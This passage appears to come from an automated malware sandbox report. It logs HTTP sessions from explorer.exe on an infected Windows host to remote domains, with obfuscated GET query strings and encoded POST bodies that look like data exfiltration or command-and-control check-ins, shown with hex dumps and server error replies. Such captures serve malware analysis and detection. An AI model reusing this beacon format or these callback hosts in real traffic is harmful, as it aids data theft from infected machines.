UfSi2-m8E1LJlsLnyp09PlsNwizJH1UQ(HdZVFLfanpmxwqlgo5ib8jmGXVNDlR04PbGqXHT4IQTreJ_1if0BiPEF8bOu92NB4wuRPIL3uVgZoYTTQMkoyUrfIWq9XrA19qTUUnivLLMQ4pdRhHLgwRGzn5RoJDVhbDEO1rlnnriaOQ5BustAIyYtrp8HjDXyFNlKi(RLEx2Q5ToBtzj1NHYAVyA2V(LlXmtO243ZX~_swAbmHwPoBA6eeRS90DJFmr-f_bDOnDGjLGw1t(YX7~0UY3LkRTnD9rurPqBrB~VsKOrADoMib23mkqSMJVQfcN2WYwegcQijRlemKtVF0Jh8135nZijWmBHhQiqJkWG0a3mxil5dkGTzs7atVKiQZuppjRVyhB_G-Ix1fd-HPf75r5QYIrK0kIueYGClnZ4IyHUFRyyKLWA8AR4DxhqVOYVVmW_NkA0FXHMGw(mGuaoDSrplSM6zZlT6ChjULGgAJIqZzDMPkMycfoTaUB0pBYTQLDzq9yMC6WDtyQzFmG3ynrmvIegFxHw~ylhJEdNGTR57g5FKY4duN12F4TLBjllHJMj7579Pbt5aZl4twAf9icp50r3RytqaEVPXen7Kk4ECh(YsdRzg3jihwApztmC6ivxg4wGbyp5borV(KHT~kJBbDTVxN9923NeWvsYx4kzBFNxi6x2KAHHKslOHilQOQWWUriKHrdMp8G80RHxRU3Z6x19Pkhw08ks2CAyWh0D6breMu4qSoXm5KufMJpGNHyxxLlxs0stneFBBRuufxSidQOsVfokW5fwtlOmVT1S6LtELJAVAby4qwqSE_im(EayvI48USPlrYyXbWVuUPCSPGKrKlf8vHZNCpzU(xfgc7XFtiKvX2um1dK91ySg(ts8X_ofW_zNMCmoqX4kOQKbMi6MKQNK(QtbHjzhYs64DkpKIc8JR73fBmokPxUP3AjOb-cnXDeScZpnDN2xmH~RqU8z7uVFHrcMQ37h8nwEV7jcUt5Uia9dJXRa8BuJW_kjTHTNMMuds03hWH~DLZsGPjSnQhErSH~pwdaQ8jV_qHJCfdKY6700v7ESaROqpKGMkcJKUJC9Xd3cijmzHnt8(Xk7leEIOtl_bTKhnaVbFHttCm0BsejfcKetbXMlEGIdvyh5KDyO~CWPzIy4S-F1ecPPSZu8lam3djQgPMaxy0v27mBH1P9saPoB7vfIBO9YnUHGrISMc2U3KI(OZSfHp_umMvlOIxin6bsTNcPGqe(aukAjv9V273Ex
                                                                                                                      Mar 20, 2023 09:08:58.202984095 CET156INHTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 1238
                                                                                                                      date: Mon, 20 Mar 2023 08:08:58 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      x-powered-by: Niagahoster
                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                      x-content-type-options: nosniff
                                                                                                                      vary: User-Agent
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border
                                                                                                                      Mar 20, 2023 09:08:58.203006983 CET156INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65
                                                                                                                      Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Te


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      6192.168.2.3497055.181.216.14180C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:09.878628969 CET157OUTGET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== HTTP/1.1
                                                                                                                      Host: www.dirdikyepedia.com
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:09:10.038641930 CET158INHTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 1238
                                                                                                                      date: Mon, 20 Mar 2023 08:09:10 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      x-powered-by: Niagahoster
                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                      x-content-type-options: nosniff
                                                                                                                      vary: User-Agent
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border
                                                                                                                      Mar 20, 2023 09:09:10.038702965 CET159INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65
                                                                                                                      Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Te


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      7192.168.2.349706213.171.195.10580C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:15.130350113 CET160OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.g2fm.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 189
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.g2fm.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.g2fm.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 72 70 4e 6f 6d 70 6e 76 68 39 48 46 35 69 39 48 6b 64 65 5a 32 50 6d 32 55 31 6a 61 74 64 64 35 51 68 54 64 28 66 36 7a 54 35 46 59 77 51 68 53 7e 71 54 4c 52 4d 67 75 6d 77 68 6c 76 4a 58 4f 4d 58 51 71 4f 39 71 33 54 52 31 42 74 56 4e 70 6f 32 47 43 61 38 4a 61 52 31 48 4d 55 6d 43 33 50 78 78 6d 65 4c 4a 2d 77 64 34 49 48 66 4f 70 41 34 35 51 63 4e 6c 69 79 6d 49 57 75 6c 64 34 51 30 67 34 4d 30 4d 72 7e 48 4e 4e 59 6f 61 38 72 34 4b 79 38 57 59 4d 49 4a 78 4d 44 66 4f 50 7e 5a 38 48 56 70 4e 54 4d 2d 79 38 59 71 6e 4e 50 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: ICHyvj5=rpNompnvh9HF5i9HkdeZ2Pm2U1jatdd5QhTd(f6zT5FYwQhS~qTLRMgumwhlvJXOMXQqO9q3TR1BtVNpo2GCa8JaR1HMUmC3PxxmeLJ-wd4IHfOpA45QcNliymIWuld4Q0g4M0Mr~HNNYoa8r4Ky8WYMIJxMDfOP~Z8HVpNTM-y8YqnNPw).
                                                                                                                      Mar 20, 2023 09:09:15.164403915 CET161INHTTP/1.1 405 Not Allowed
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Mon, 20 Mar 2023 08:09:15 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 157
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      8192.168.2.349707213.171.195.10580C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:17.689999104 CET167OUTPOST /0oqq/ HTTP/1.1
                                                                                                                      Host: www.g2fm.co.uk
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 5337
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Origin: http://www.g2fm.co.uk
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Accept: */*
                                                                                                                      Referer: http://www.g2fm.co.uk/0oqq/
                                                                                                                      Accept-Language: en-US
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Data Raw: 49 43 48 79 76 6a 35 3d 72 70 4e 6f 6d 70 6e 76 68 39 48 46 36 43 4e 48 69 2d 47 5a 39 50 6d 31 65 56 6a 61 69 39 64 39 51 68 50 64 28 65 75 6a 47 62 70 59 77 44 70 53 28 49 37 4c 54 4d 67 75 6b 77 68 68 79 5a 58 63 4d 58 31 54 4f 35 76 56 54 54 35 42 74 48 31 70 72 57 47 44 47 73 4a 62 63 56 48 4c 62 47 43 33 50 78 39 4c 65 4a 67 4c 77 63 41 49 48 4a 61 70 41 36 68 54 64 64 6c 6e 39 47 49 57 75 6c 52 6a 51 30 67 4f 4d 30 6b 37 7e 48 74 4e 5a 37 43 38 71 71 69 7a 73 32 59 31 58 35 77 6e 43 36 58 56 33 62 6b 4d 65 72 6c 66 45 62 6d 73 53 4c 69 6b 55 41 70 52 59 55 52 48 79 61 4a 5a 47 33 74 32 4f 4c 37 6f 42 59 51 4e 71 71 62 45 76 71 77 48 43 48 64 48 75 4e 55 42 39 43 38 62 78 73 5a 50 7a 38 42 64 4e 36 35 2d 67 67 4e 37 6d 72 72 45 77 36 4d 68 59 72 32 4c 54 77 42 4c 36 56 79 78 77 52 6d 6b 46 2d 68 6a 7e 59 4a 4e 55 71 35 42 49 42 77 6a 5a 4d 44 46 7a 52 59 6c 34 56 62 38 74 61 47 6e 45 79 31 61 37 62 53 39 51 55 39 59 41 67 4b 41 4f 48 4d 57 77 53 75 54 78 42 67 62 52 7a 48 68 28 31 78 30 67 55 6b 69 53 50 69 7a 69 62 31 45 50 6e 6b 6b 6f 35 78 6f 53 4f 61 41 63 4a 4b 51 30 54 70 43 42 32 64 4b 53 30 70 4e 6f 50 65 4b 33 6c 39 54 50 63 6f 71 28 77 63 43 4f 6a 43 58 77 33 48 56 61 46 41 74 36 36 43 55 63 57 7e 38 71 36 62 63 73 47 79 65 76 7a 54 56 4a 66 56 52 68 55 57 73 6f 4a 4e 33 48 72 79 6a 4b 52 4d 61 50 71 4d 39 65 2d 45 56 56 58 66 5f 55 36 70 45 57 64 59 45 7e 6c 4e 46 71 57 78 64 58 43 47 37 57 45 78 5f 77 52 6d 78 6a 36 5a 32 68 74 4a 39 47 44 4d 62 47 61 4b 37 67 66 48 53 4a 66 46 47 51 74 70 37 48 6d 6d 6e 76 4e 42 4e 52 33 49 37 66 46 67 54 70 6c 57 33 50 4e 4b 70 43 5a 61 7a 77 73 41 38 34 6d 72 79 6b 64 42 6b 41 79 49 6d 36 6c 62 70 36 6c 6f 35 45 61 33 52 32 62 52 73 79 79 7a 72 48 68 6a 38 66 78 79 6e 33 2d 4d 6d 39 48 45 37 70 6a 51 53 6c 66 54 72 38 4c 33 4a 69 38 28 4e 7e 71 32 76 32 69 4e 45 55 41 41 37 35 6e 74 6f 58 45 78 38 58 6f 68 54 64 47 56 6a 52 2d 50 6e 62 58 49 50 6c 69 64 5f 7e 7a 6a 41 31 47 51 41 66 62 42 69 4a 68 45 61 78 62 76 35 38 73 58 5f 4d 4d 34 64 56 6b 51 35 6f 44 67 77 32 4e 79 49 7e 6e 53 32 35 35 55 63 5a 32 39 62 43 31 71 71 39 66 75 42 54 30 62 47 6f 49 6b 52 37 33 4e 4e 6e 55 5a 65 34 43 7a 2d 44 68 57 54 6d 64 6b 34 73 4a 44 6b 42 50 76 4d 69 34 49 68 6a 35 50 4b 39 64 33 56 6d 4a 65 7a 37 72 45 45 6d 47 70 43 52 73 67 37 75 4b 6c 71 55 6c 52 57 72 76 50 43 6f 4b 53 63 4d 75 76 4b 52 47 49 58 59 4a 63 56 67 69 76 36 46 44 43 74 7e 62 52 48 4e 2d 36 69 4d 4a 65 4e 66 4c 39 70 46 30 4c 42 79 38 64 71 74 57 48 41 4a 50 39 73 36 41 4d 77 4d 62 71 59 36 67 34 57 52 56 7e 56 4f 53 48 43 5a 4f 33 6e 42 4b 6c 55 72 4b 68 48 78 6d 6f 37 57 41 6e 46 69 78 38 43 39 5a 42 6e 7a 78 75 41 69 6e 51 77 69 73 34 51 69 51 74 6d 4f 35 65 41 54 4d 78 67 37 4b 41 4e 6c 45 6b 72 37 52 6a 31 77 71 41 75 32 51 62 5f 4d 4c 74 77 58 50 65 49 69 46 4d 41 72 78 39 77 68 73 28 73 70 38 7a 53 67 79 79 6a 38 76 46 32 7a 6d 28 36 75 52 6b 45 58 4b 6d 6c 79 79 6c 78 50 4a 79 33 44 45 55 61 57 6e 6b 68 4c 76 6c 61 72 59 55 2d 6c 73 32 32 5a 4a 69 6c 28 49 51 2d 61 72 54 30 50 55 78 4a 73 4e 72 6f 70 58 35 72 38 6d 78 65 48 4b 30 73 31 59 31 6c 54 5f 4a 54 4b 70 50 44 75 53 73 70 37 75 53 66 54 48 35 6b 75 2d 66 37 45 69 32 79 66 55 52 58 39 73 33 41 32 34 4c 45 66 6e 59 32 6d 55 50 47 6f 6d 69 51 5a 35 4e 5f 6a 36 77 46 62 6a 64 39 30 52 31 79 65 46 67 53 63 62 75 55 34 38 44 35 55 56 6a 48 7a 39 61 41 4a 5a 69 31 73 67 56 63 41 6c 43 44 75 41 6f 51 51 77 32 48 28 76 63 4b 4b 63 63 53 59 79 74 79 55 6e 44 4f 34 4a 6f 50 32 78 39 73 50 65 57 65 4e 37 7a 64 33 4e 4f 35 6c 5a 70 65 50 58 75 44 5a 67 69 55 48 59 6b 42 6d 43 30 35 44 6c 6c 46 43 4b 6a 6c 33 35 67 65 66 73 52 33 78 77 56 42 44 78 7a 57 49 5f 42 7a 28 51 62 4d 79 56 69 6d 68 30 61 48 71 43 78 7a 61 36 7a 70 30 46 56 4f 62 56 79 67 71 5a 38 2d 56 7a 62 63 68 55 39 69 64 78 77 38 44 35 69 6f 7a 4c 75 4f 37 6d 4e 74 4f 38 59 62 6e 39 77 74 49 4a 32 35 57 7a 67 56 38 32 69 2d 56 37 46 6f 41 6c 69 6d 7e 4f 78 46 28 74 71 54 70 47 4d 5f 4c 6c 4a 4b 77 4d 65 37 79 74 57 37 66 52 4f 71 48 35 50 44 4a 4b 74 61 69 79 67 78 64 52 54 4c 56 30 52
                                                                                                                      Data Ascii: ICHyvj5=rpNompnvh9HF6CNHi-GZ9Pm1eVjai9d9QhPd(eujGbpYwDpS(I7LTMgukwhhyZXcMX1TO5vVTT5BtH1prWGDGsJbcVHLbGC3Px9LeJgLwcAIHJapA6hTddln9GIWulRjQ0gOM0k7~HtNZ7C8qqizs2Y1X5wnC6XV3bkMerlfEbmsSLikUApRYURHyaJZG3t2OL7oBYQNqqbEvqwHCHdHuNUB9C8bxsZPz8BdN65-ggN7mrrEw6MhYr2LTwBL6VyxwRmkF-hj~YJNUq5BIBwjZMDFzRYl4Vb8taGnEy1a7bS9QU9YAgKAOHMWwSuTxBgbRzHh(1x0gUkiSPizib1EPnkko5xoSOaAcJKQ0TpCB2dKS0pNoPeK3l9TPcoq(wcCOjCXw3HVaFAt66CUcW~8q6bcsGyevzTVJfVRhUWsoJN3HryjKRMaPqM9e-EVVXf_U6pEWdYE~lNFqWxdXCG7WEx_wRmxj6Z2htJ9GDMbGaK7gfHSJfFGQtp7HmmnvNBNR3I7fFgTplW3PNKpCZazwsA84mrykdBkAyIm6lbp6lo5Ea3R2bRsyyzrHhj8fxyn3-Mm9HE7pjQSlfTr8L3Ji8(N~q2v2iNEUAA75ntoXEx8XohTdGVjR-PnbXIPlid_~zjA1GQAfbBiJhEaxbv58sX_MM4dVkQ5oDgw2NyI~nS255UcZ29bC1qq9fuBT0bGoIkR73NNnUZe4Cz-DhWTmdk4sJDkBPvMi4Ihj5PK9d3VmJez7rEEmGpCRsg7uKlqUlRWrvPCoKScMuvKRGIXYJcVgiv6FDCt~bRHN-6iMJeNfL9pF0LBy8dqtWHAJP9s6AMwMbqY6g4WRV~VOSHCZO3nBKlUrKhHxmo7WAnFix8C9ZBnzxuAinQwis4QiQtmO5eATMxg7KANlEkr7Rj1wqAu2Qb_MLtwXPeIiFMArx9whs(sp8zSgyyj8vF2zm(6uRkEXKmlyylxPJy3DEUaWnkhLvlarYU-ls22ZJil(IQ-arT0PUxJsNropX5r8mxeHK0s1Y1lT_JTKpPDuSsp7uSfTH5ku-f7Ei2yfURX9s3A24LEfnY2mUPGomiQZ5N_j6wFbjd90R1yeFgScbuU48D5UVjHz9aAJZi1sgVcAlCDuAoQQw2H(vcKKccSYytyUnDO4JoP2x9sPeWeN7zd3NO5lZpePXuDZgiUHYkBmC05DllFCKjl35gefsR3xwVBDxzWI_Bz(QbMyVimh0aHqCxza6zp0FVObVygqZ8-VzbchU9idxw8D5iozLuO7mNtO8Ybn9wtIJ25WzgV82i-V7FoAlim~OxF(tqTpGM_LlJKwMe7ytW7fROqH5PDJKtaiygxdRTLV0RmL4slp-fIYn75lFJQRf2FmwhwiPdoygyUOR7gtDY7bL4ItskSs1mDr32oE3a0Bbj5UJWjKOhPmaGkyI23LRvymi016gB5XhMbmJVlvLj3J18tcvdoUb9HuO9giTVJvrtazjARiQ6cqT(ZDl4ZYC1jAqsuSrfdmcUqYykr66ttDBrbCaYa0iLyF222EkAW~kTIlFjpSitsDMoYy-SAlQBlzNRKUvAGN5mz0rG7L7q5nus89PnuMcxtFtlFigZzHqw-eBlr9tO-~5QBTIgfGRq9f2q5IDlGw6DOqw23Ijbsb0SnQ-yKJdbbxoufHZ1kS8YrhIeWG30g6THG5UWZCC8e0ktqWgWd5-XPjJqfKpPwC3gA~8tEkqmJPDbt77bvVvtIhdWkVj0A6qMG~8w08b6P8e1rFt0VBuyPgH9DfuGTZNLtd0IzsTvnuYOOX2bE74LrEkNBiSnSvSGlwk~cpDC1IgQqPSabhz8xBJdVgi6c(y8WndatCSSFkG6GrVGuGdxSVcxQPFSjvr5R1fa6gnDm2Pq3uFMUWWR2QOBnD5QC6PO7Me3lelQLOzRZOwDgpUekS-j4nKz2aby8MjywLLArelqKDA~uCpp9NeF_rfa17jAki8Zr3eoDsP6bbtBunFE5VCh1mdnwc7SmTAmjbmzXTMoQ(RiAGIKyIbSDplIkQ3qcYNmo3Fhd5FvLHDDPu7vWvY8S001K3uv0kAehntF55BwnI-lQhzT-uLl9Q-(tLx9taf(7nkALq-ORD2MBRvxs~